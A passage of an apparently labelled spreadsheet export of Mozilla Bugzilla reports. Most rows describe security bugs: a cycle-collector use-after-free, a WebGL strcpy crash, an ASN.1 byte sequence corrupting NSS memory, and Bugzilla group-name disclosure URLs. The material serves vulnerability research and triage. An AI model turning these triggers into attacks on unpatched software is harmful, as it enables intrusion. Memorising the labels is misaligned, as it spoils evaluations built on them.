08d3b630  00000000 00000000 00000000 00000000
0:000&gt; dd 01901400 
01901400  0073006e 00440049 004d004f 006f004e
01901410  00650064 00650053 0065006c 00740063
01901420  0072006f 00000000 00000000 00000000
01901430  00540053 00540041 005f0045 00530049
01901440  0044005f 0043004f 004d0055 004e0045
01901450  00000054 017e38ac 00000000 00020004
01901460  0073006e 00530049 0063006f 0065006b
01901470  00540074 00610072 0073006e 006f0070
in source code, 
void
nsCycleCollector::MarkRoots(GCGraphBuilder &amp;builder)
{
    mGraph.mRootCount = builder.Count();
    // read the PtrInfo out of the graph that we are building
    NodePool::Enumerator queue(mGraph.mNodes);
    while (!queue.IsDone()) {
        PtrInfo *pi = queue.GetNext();
        builder.Traverse(pi);
    }
}
PRBool
nsCycleCollector::BeginCollection()
{
    if (mParams.mDoNothing)
        return PR_FALSE;
    GCGraphBuilder builder(mGraph, mRuntimes);
....................
     MarkRoots(builder);
............
}
In these functions we can know, One Graph node has been freed, so made the mistake.
in 1.xhtml, we can find the code:
&lt;xht:isindex d=""/&gt;
"isindex" will create a graph object, it seems because the "isindex" keyword made the mistake.
It's clear , it's a exploitable vuln.
================================================================================</t>
        </is>
      </c>
      <c r="X6308" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6309">
      <c r="A6309" t="n">
        <v>1110488</v>
      </c>
      <c r="B6309" t="inlineStr">
        <is>
          <t>2014-12-11 14:37:00 -0800</t>
        </is>
      </c>
      <c r="C6309" t="inlineStr">
        <is>
          <t>webgl shader compilation log strcpy not allocated memory</t>
        </is>
      </c>
      <c r="D6309" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:25 -0700</t>
        </is>
      </c>
      <c r="E6309" t="n">
        <v>1</v>
      </c>
      <c r="F6309" t="n">
        <v>1</v>
      </c>
      <c r="G6309" t="n">
        <v>3</v>
      </c>
      <c r="H6309" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6309" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6309" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K6309" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L6309" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6309" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6309" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6309" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6309" t="inlineStr">
        <is>
          <t>[adv-main36+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q6309" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6309" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6309" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T6309" t="n">
        <v>1</v>
      </c>
      <c r="U6309" t="n">
        <v>0</v>
      </c>
      <c r="V6309" t="n">
        <v>17</v>
      </c>
      <c r="W6309" t="inlineStr">
        <is>
          <t>Created attachment 8535252
test.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0 Iceweasel/34.0
Build ID: 20141203163643
Steps to reproduce:
I opened the attached file with
- Firefox 34 on ubuntu with NVIDIA closed source drivers
- Iceweasel 31 on debian (jessie) with NVIDIA closed source drivers
- Icewease 34 on debian (experimental) with NVIDIA closed source drivers
Actual results:
In all three configurations a segmentation fault happened (consistently). I haven't had the chance to test it with non NVIDIA drivers or on windows. It may be related to NVIDIA drivers, but I suspect the bug to be in FF code.
This is a backtrace (iceweasel 31):
#0  __strcpy_ssse3 () at ../sysdeps/x86_64/multiarch/strcpy-ssse3.S:2289
#1  0x00007ffff3d0f87c in mozilla::WebGLContext::CompileShader (this=0x7fffc3a2e9c0, shader=0x7fffc3a2e940)
    at /tmp/buildd/iceweasel-31.3.0esr/content/canvas/src/WebGLContextGL.cpp:3135
#2  0x00007ffff3916f33 in mozilla::dom::WebGLRenderingContextBinding::compileShader (cx=0x7fffd2d08a80, obj=..., self=0x7fffc34a7c00, args=...)
    at /tmp/buildd/iceweasel-31.3.0esr/build-browser/dom/bindings/WebGLRenderingContextBinding.cpp:8225
#3  0x00007ffff395beea in mozilla::dom::GenericBindingMethod (cx=0x7fffd2d08a80, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;)
    at /tmp/buildd/iceweasel-31.3.0esr/dom/bindings/BindingUtils.cpp:2297
#4  0x00007ffff4959a01 in CallJSNative (args=..., native=&lt;optimized out&gt;, cx=&lt;optimized out&gt;)
    at /tmp/buildd/iceweasel-31.3.0esr/js/src/jscntxtinlines.h:239
#5  js::Invoke (cx=0x7fffd2d08a80, args=..., construct=(js::CONSTRUCT | unknown: 4154173016))
    at /tmp/buildd/iceweasel-31.3.0esr/js/src/vm/Interpreter.cpp:475
#6  0x00007ffff49501d2 in Interpret (cx=0x7fffd2d08a80, state=...) at /tmp/buildd/iceweasel-31.3.0esr/js/src/vm/Interpreter.cpp:2620
#7  0x00007ffff4959669 in js::RunScript (cx=0x7fffd2d08a80, state=...) at /tmp/buildd/iceweasel-31.3.0esr/js/src/vm/Interpreter.cpp:422
#8  0x00007ffff49598d9 in js::Invoke (cx=0x7fffd2d08a80, args=..., construct=(js::CONSTRUCT | unknown: 4154173016), construct@entry=js::NO_CONSTRUCT)
    at /tmp/buildd/iceweasel-31.3.0esr/js/src/vm/Interpreter.cpp:494
It appears that
compiler-&gt;getInfoSink().info.size() is 0 in ShGetInfo()
lenWithNull is 1 in WebGLContext::CompileShader(), therefore len is 0 and the new memory is not allocated.
I'm not sure this is actually a security issue, but maybe there could be a way to control the pointers involved in the strcpy() and do nasty things.</t>
        </is>
      </c>
      <c r="X6309" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6310">
      <c r="A6310" t="n">
        <v>1345635</v>
      </c>
      <c r="B6310" t="inlineStr">
        <is>
          <t>2017-03-08 14:02:23 -0800</t>
        </is>
      </c>
      <c r="C6310" t="inlineStr">
        <is>
          <t>Update Highlight cell to the new layout</t>
        </is>
      </c>
      <c r="D6310" t="inlineStr">
        <is>
          <t>2017-08-23 06:38:55 -0700</t>
        </is>
      </c>
      <c r="E6310" t="n">
        <v>1</v>
      </c>
      <c r="F6310" t="n">
        <v>1</v>
      </c>
      <c r="G6310" t="n">
        <v>2</v>
      </c>
      <c r="H6310" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6310" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J6310" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K6310" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6310" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6310" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N6310" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6310" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6310" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q6310" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6310" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6310" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6310" t="n">
        <v>1</v>
      </c>
      <c r="U6310" t="n">
        <v>0</v>
      </c>
      <c r="V6310" t="n">
        <v>2</v>
      </c>
      <c r="W6310" t="inlineStr">
        <is>
          <t>The new highlight cell is half the size of the original to allow 2 highlights to appear side to side. 
This will require the highlight cell to be a UICollectionViewCell. Also make sure to update it.</t>
        </is>
      </c>
      <c r="X6310" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6311">
      <c r="A6311" t="n">
        <v>76983</v>
      </c>
      <c r="B6311" t="inlineStr">
        <is>
          <t>2001-04-20 19:52:54 -0700</t>
        </is>
      </c>
      <c r="C6311" t="inlineStr">
        <is>
          <t>Segfault in gc_find_flags</t>
        </is>
      </c>
      <c r="D6311" t="inlineStr">
        <is>
          <t>2018-10-16 12:20:08 -0700</t>
        </is>
      </c>
      <c r="E6311" t="n">
        <v>1</v>
      </c>
      <c r="F6311" t="n">
        <v>1</v>
      </c>
      <c r="G6311" t="n">
        <v>6</v>
      </c>
      <c r="H6311" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6311" t="inlineStr">
        <is>
          <t>Other Applications Graveyard</t>
        </is>
      </c>
      <c r="J6311" t="inlineStr">
        <is>
          <t>Venkman JS Debugger</t>
        </is>
      </c>
      <c r="K6311" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6311" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6311" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6311" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6311" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6311" t="inlineStr"/>
      <c r="Q6311" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6311" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6311" t="inlineStr">
        <is>
          <t>mozilla0.9.4</t>
        </is>
      </c>
      <c r="T6311" t="n">
        <v>1</v>
      </c>
      <c r="U6311" t="n">
        <v>0</v>
      </c>
      <c r="V6311" t="n">
        <v>17</v>
      </c>
      <c r="W6311" t="inlineStr">
        <is>
          <t>Fix cause of bug 76979, or comment out |console.jsds.scriptHook =
console.scriptHooker;| from venkman-debugger.js
Get venkman running as described in bug 76979.
Start a navigator instance from venkman, load
chrome://venkman/content/tests/testpage.html
click one of the debugger keyword buttons, you should see "Stopped for debugger
keyword" in the venkman console.
type "dd(dumpObjectTree(console.currentThreadState, 2))" in venkman.  dd is
"debug dump" and is just a wrapper around dump(), dumpObjectTree() uses for..in
to iterate the properties of the first parameter and create a string that
contains an ascii art tree of the object.  dumpObjectTree() does of string
concatenations. The second parameter of dumpObjectTree() is how may levels to
recurse.  currentThreadState is an instance of jsdIThreadState.
You should see a large ascii art tree on stderr.
now, dd(dumpObjectTree(console.currentThreadState, 5)).  The string this creates
is so large it triggers a gc, which asserts in gc_find_flags.</t>
        </is>
      </c>
      <c r="X6311" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6312">
      <c r="A6312" t="n">
        <v>1268854</v>
      </c>
      <c r="B6312" t="inlineStr">
        <is>
          <t>2016-04-29 04:09:25 -0700</t>
        </is>
      </c>
      <c r="C6312" t="inlineStr">
        <is>
          <t>stack-buffer-overflow in mozilla::gfx::BasePoint4d</t>
        </is>
      </c>
      <c r="D6312" t="inlineStr">
        <is>
          <t>2024-05-30 09:16:47 -0700</t>
        </is>
      </c>
      <c r="E6312" t="n">
        <v>1</v>
      </c>
      <c r="F6312" t="n">
        <v>1</v>
      </c>
      <c r="G6312" t="n">
        <v>3</v>
      </c>
      <c r="H6312" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6312" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6312" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6312" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L6312" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6312" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6312" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6312" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6312" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q6312" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6312" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6312" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T6312" t="n">
        <v>1</v>
      </c>
      <c r="U6312" t="n">
        <v>0</v>
      </c>
      <c r="V6312" t="n">
        <v>50</v>
      </c>
      <c r="W6312" t="inlineStr">
        <is>
          <t>Created attachment 8747018
gfx_stackbuffer
While visiting team-cymru.org and having the website open for a while I get a stack-buffer-overflow in gfx code with my ASan build. This is reproducible for me using an 45.1.0esr based Tor Browser on a Linux 64bit machine. We don't have patches for that part of the code, thus I guess this should be reproducible with a vanilla Firefox 45.1.0 as well at least. Attached is the stack trace.</t>
        </is>
      </c>
      <c r="X6312" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6313">
      <c r="A6313" t="n">
        <v>653477</v>
      </c>
      <c r="B6313" t="inlineStr">
        <is>
          <t>2011-04-28 10:25:50 -0700</t>
        </is>
      </c>
      <c r="C6313" t="inlineStr">
        <is>
          <t>[SECURITY] Group names can be guessed when creating or editing a bug</t>
        </is>
      </c>
      <c r="D6313" t="inlineStr">
        <is>
          <t>2011-09-24 05:49:12 -0700</t>
        </is>
      </c>
      <c r="E6313" t="n">
        <v>1</v>
      </c>
      <c r="F6313" t="n">
        <v>1</v>
      </c>
      <c r="G6313" t="n">
        <v>4</v>
      </c>
      <c r="H6313" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6313" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6313" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K6313" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L6313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6313" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6313" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6313" t="inlineStr"/>
      <c r="Q6313" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6313" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6313" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T6313" t="n">
        <v>1</v>
      </c>
      <c r="U6313" t="n">
        <v>0</v>
      </c>
      <c r="V6313" t="n">
        <v>32</v>
      </c>
      <c r="W6313" t="inlineStr">
        <is>
          <t>Symptoms are a bit different in 3.4/3.6 and in 4.0/4.2, but it's one same problem:
3.4/3.6:
=======
When entering a new bug, you can pass bit-X=1 to list of parameters, where X is a group ID, and if the group exists but is not used for bugs, then you get:
"Attempted to add bug to the 'foo' group, which is not used for bugs."
If the group ID exists but is either a system group or a user group used for bugs, then you get no error. So only the name of user groups which aren't used for bugs can be disclosed.
For existing bugs, there is no name disclosed, because the error message displays the group ID instead.
4.0/4.2:
=======
When editing an existing bug, you can pass groups=foo to the list of parameters, where foo is the group name, and if the group doesn't exist, process_bug.cgi tells you so:
"There is no group named 'foo'."
https://bugzilla.mozilla.org/process_bug.cgi?id=653341&amp;groups=I_love_LpSolit
If the group exists, you get:
"You tried to restrict bug X to to the 'foo' group, but bugs in the 'TestProduct' product can not be restricted to that group." (nit: note also the typo "to to")
https://bugzilla.mozilla.org/process_bug.cgi?id=653341&amp;groups=bugzilla-approvers
When creating a new bug, illegal groups are silently ignored (bug 653341).</t>
        </is>
      </c>
      <c r="X6313" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6314">
      <c r="A6314" t="n">
        <v>1202868</v>
      </c>
      <c r="B6314" t="inlineStr">
        <is>
          <t>2015-09-08 15:12:21 -0700</t>
        </is>
      </c>
      <c r="C6314" t="inlineStr">
        <is>
          <t>ASN.1 decoder heap overflow when decoding constructed OCTET STRING that mixes indefinite and definite length encodings</t>
        </is>
      </c>
      <c r="D6314" t="inlineStr">
        <is>
          <t>2016-05-04 15:59:24 -0700</t>
        </is>
      </c>
      <c r="E6314" t="n">
        <v>1</v>
      </c>
      <c r="F6314" t="n">
        <v>1</v>
      </c>
      <c r="G6314" t="n">
        <v>3</v>
      </c>
      <c r="H6314" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6314" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6314" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6314" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L6314" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6314" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6314" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6314" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6314" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+] Coordinate landing with Chrome team.</t>
        </is>
      </c>
      <c r="Q6314" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6314" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6314" t="inlineStr">
        <is>
          <t>3.20.1</t>
        </is>
      </c>
      <c r="T6314" t="n">
        <v>1</v>
      </c>
      <c r="U6314" t="n">
        <v>0</v>
      </c>
      <c r="V6314" t="n">
        <v>37</v>
      </c>
      <c r="W6314" t="inlineStr">
        <is>
          <t>Created attachment 8658396
checkcert.c
I discovered this when investigating bug 1192028. Consider the following ASN.1:
24 0A           [OCTET STRING | CONSTRUCTED] [length is 10 bytes]
   24 80        [OCTET STRING | CONSTRUCTED] [indefinite length]
      04 01 01  [OCTET STRING] [length is 1] [value is 1]
   00 00        [end of indefinite length contents marker]
   04 01 02     [OCTET STRING] [length is 1] [value is 2]
If I understand correctly, this is valid ASN.1 and is equivalent to 04 02 01 02 (i.e. an OCTET STRING of length 2 with value 01 02).
However, under ASAN using a setup similar to bug 1192028 (see attached), this results in a use-after-poison that I believe could be parleyed into a heap overflow.</t>
        </is>
      </c>
      <c r="X6314" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6315">
      <c r="A6315" t="n">
        <v>468279</v>
      </c>
      <c r="B6315" t="inlineStr">
        <is>
          <t>2008-12-06 16:56:46 -0800</t>
        </is>
      </c>
      <c r="C6315" t="inlineStr">
        <is>
          <t>softoken crash importing email cert into newly upgraded DB</t>
        </is>
      </c>
      <c r="D6315" t="inlineStr">
        <is>
          <t>2009-03-20 14:21:02 -0700</t>
        </is>
      </c>
      <c r="E6315" t="n">
        <v>1</v>
      </c>
      <c r="F6315" t="n">
        <v>1</v>
      </c>
      <c r="G6315" t="n">
        <v>3</v>
      </c>
      <c r="H6315" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6315" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6315" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6315" t="inlineStr">
        <is>
          <t>3.12</t>
        </is>
      </c>
      <c r="L6315" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6315" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6315" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6315" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6315" t="inlineStr">
        <is>
          <t>FIPS</t>
        </is>
      </c>
      <c r="Q6315" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6315" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6315" t="inlineStr">
        <is>
          <t>3.12.3</t>
        </is>
      </c>
      <c r="T6315" t="n">
        <v>1</v>
      </c>
      <c r="U6315" t="n">
        <v>0</v>
      </c>
      <c r="V6315" t="n">
        <v>22</v>
      </c>
      <c r="W6315" t="inlineStr">
        <is>
          <t>(Using a debug trunk tip build of NSS)
If a program upgrades a cert8 to cert9, and then imports a cert, softoken
imports the cert into the cert8 DB, and then crashes in a VERY confused state. 
After debugging this most of the day, I've concluded that after an upgrade,
softoken is really confused about whether it's using cert8 or cert9.
This MUST be fixed for Sun's 3.12 release.  
Steps to reproduce:
mkdir -p DB
# create new empty cert8 DB
certutil -N -d DB
# upgrade it to cert9 and import email cert
certutil -E -d sql:DB -n email@address -i email-cert.der -t ',,p'
Expected result:
email cert successfully imported into cert9.db.  cert8.db still empty.
Actual result:
cert is imported into cert8.db, then softoken crashes on an assertion.
I did this test using the cert attached to bug 185167.  The actual command
I used was:
certutil -E -d sql:DB -n ludek.rasek@centrum.cz -i /tmp/185167b.der -t ',,p'
Here is some info from debugging.  
Things get really interesting at the point in the NSC_CreateObject where it
tries to "handle" the token object, writing it to the DB.  The stack at that
point is:
softokn3.dll!sftkdb_write()  		Line 1106
softokn3.dll!sftk_handleCertObject()  	Line 701 + 0x14 bytes
softokn3.dll!sftk_handleObject()  	Line 1472 + 0xd bytes
softokn3.dll!NSC_CreateObject()  	Line 3681 + 0xd bytes
nss3.dll!import_object()  		Line 250 + 0x1b bytes
nss3.dll!nssToken_ImportCertificate()  	Line 579 + 0x18 bytes
nss3.dll!PK11_ImportCert()  		Line 907 + 0x3a bytes
certutil.exe!AddCert()  		Line 189 + 0x15 bytes
certutil.exe!certutil_main()  		Line 2803 + 0x3d bytes
certutil.exe!main()  			Line 2934 + 0xf bytes
When sftkdb_write calls db-&gt;sdb_Begin, 
    crv = (*db-&gt;sdb_Begin)(db);
the function it actually calls is lg_Begin.
When sftkdb_write calls sftkdb_lookupObject
    /* Find any copies that match this particular object */
    crv = sftkdb_lookupObject(db, object-&gt;objclass, &amp;id, template, count);
that function finds the SMIME object (!?) as if it is already in the DB.
So, sftkdb_write calls:
	/* object already exists, modify it's attributes */
	*objectID = id;
        crv = sftkdb_setAttributeValue(arena, handle, db, id, template, count);
which eventually calls into lg_SetSingleAttribute.  The stack looks like:
lg_SetSingleAttribute()     Line 1729
lg_SetAttributeValue()      Line 1786 + 0x17 bytes
sftkdb_setAttributeValue()  Line 1070 + 0x18 bytes
sftkdb_write()              Line 1148 + 0x1d bytes
lg_SetSingleAttribute handles some classes of objects, but not SMIME objects.
For unhandled object classes, it returns CKR_ATTRIBUTE_READ_ONLY, and that's
just what it does for this SMIME object.  
So, back in sftkdb_write, it goes to loser, bypassing the call to 
    crv = (*db-&gt;sdb_Commit)(db);
At loser, it calls:
loser:
    if (inTransaction) {
	(*handle-&gt;db-&gt;sdb_Abort)(handle-&gt;db);
This is a call to sdb_Abort (not to lg_Abort).  Perhaps this is because
it calls handle-&gt;db-&gt;sdb_Abort instead of calling db-&gt;sdb_Abort.  
sdb_Abort calls sdb_complete, which crashes on this assertion:
    /* We must have a transation database, or we shouldn't have arrived here */
    PR_EnterMonitor(sdb_p-&gt;dbMon);
-&gt;  PORT_Assert(sdb_p-&gt;sqlXactDB);
Now, it's bad enough that sftkdb_write is confused about whether it's using
the legacy DB or the new one, and it would be an improvement just to make
it be consistent.  But it really should not be using the legacy DB at all
after NSS_Initialize completes the upgrade.  Yet it does.
Other discoveries:
PK11_SaveSMimeProfile adds 1 to the length of the string it passes for 
the CKA_NETSCAPE_EMAIL attribute, apparently to include the trailing NUL 
character (?!).  But the stored email address does not have a trailing NUL
character, so the string being stored always mismatches the string already
stored because their lengths differ by 1.  I think the "+1" in this line
    PK11_SETATTRS(attrs, CKA_NETSCAPE_EMAIL, 
				emailAddr, PORT_Strlen(emailAddr)+1); attrs++;
of PK11_SaveSMimeProfile is wrong.
Finally, I found one other major error in lg_mkHandle.  Here is patch for it;
     /* there is only one KRL, use a fixed handle for it */
-    if (handle != LG_TOKEN_KRL_HANDLE) {
+    if (handle == LG_TOKEN_KRL_HANDLE) {
        lg_XORHash(hashBuf,dbKey-&gt;data,dbKey-&gt;len);
        handle = (hashBuf[0] &lt;&lt; 24) | (hashBuf[1] &lt;&lt; 16) |
                                        (hashBuf[2] &lt;&lt; 8)  | hashBuf[3];
        handle =  class | (handle &amp; ~(LG_TOKEN_TYPE_MASK|LG_TOKEN_MASK));</t>
        </is>
      </c>
      <c r="X6315" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6316">
      <c r="A6316" t="n">
        <v>489925</v>
      </c>
      <c r="B6316" t="inlineStr">
        <is>
          <t>2009-04-23 18:16:25 -0700</t>
        </is>
      </c>
      <c r="C6316" t="inlineStr">
        <is>
          <t>Crash [@ nsContentUtils::PositionIsBefore] with XBL, two elements that have the same ID</t>
        </is>
      </c>
      <c r="D6316" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E6316" t="n">
        <v>1</v>
      </c>
      <c r="F6316" t="n">
        <v>1</v>
      </c>
      <c r="G6316" t="n">
        <v>3</v>
      </c>
      <c r="H6316" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6316" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6316" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K6316" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6316" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6316" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6316" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6316" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6316" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q6316" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6316" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6316" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T6316" t="n">
        <v>1</v>
      </c>
      <c r="U6316" t="n">
        <v>0</v>
      </c>
      <c r="V6316" t="n">
        <v>29</v>
      </c>
      <c r="W6316" t="inlineStr">
        <is>
          <t>Created attachment 374395
testcase (crashes Firefox when loaded)
Makes nsContentUtils::PositionIsBefore call random addresses, like 0x72655372.</t>
        </is>
      </c>
      <c r="X6316" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6317">
      <c r="A6317" t="n">
        <v>1237103</v>
      </c>
      <c r="B6317" t="inlineStr">
        <is>
          <t>2016-01-05 15:32:40 -0800</t>
        </is>
      </c>
      <c r="C6317" t="inlineStr">
        <is>
          <t>Application Reputation remote lookups don't work</t>
        </is>
      </c>
      <c r="D6317" t="inlineStr">
        <is>
          <t>2021-01-27 08:47:32 -0800</t>
        </is>
      </c>
      <c r="E6317" t="n">
        <v>1</v>
      </c>
      <c r="F6317" t="n">
        <v>1</v>
      </c>
      <c r="G6317" t="n">
        <v>3</v>
      </c>
      <c r="H6317" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6317" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6317" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K6317" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L6317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6317" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6317" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6317" t="inlineStr">
        <is>
          <t>[adv-main44]</t>
        </is>
      </c>
      <c r="Q6317" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6317" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6317" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T6317" t="n">
        <v>1</v>
      </c>
      <c r="U6317" t="n">
        <v>0</v>
      </c>
      <c r="V6317" t="n">
        <v>32</v>
      </c>
      <c r="W6317" t="inlineStr">
        <is>
          <t>The remote lookup service which protects downloads from malware on all platform is effectively disabled starting in Firefox 43.
This bug was introduced by the fix for bug 1107372 which failed to update this pref name:
https://dxr.mozilla.org/mozilla-central/rev/29258f59e5456a1a518ccce6b473b50c1173477e/toolkit/components/downloads/ApplicationReputation.cpp#64
As it stands, Firefox doesn't know where the application reputation server is and just bails without blocking downloaded files.</t>
        </is>
      </c>
      <c r="X6317" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6318">
      <c r="A6318" t="n">
        <v>334341</v>
      </c>
      <c r="B6318" t="inlineStr">
        <is>
          <t>2006-04-17 06:57:25 -0700</t>
        </is>
      </c>
      <c r="C6318" t="inlineStr">
        <is>
          <t>[FIX]Using image tags with a non image file, and selected view image, file will still load up, allowing access to system resources</t>
        </is>
      </c>
      <c r="D6318" t="inlineStr">
        <is>
          <t>2006-06-13 15:04:32 -0700</t>
        </is>
      </c>
      <c r="E6318" t="n">
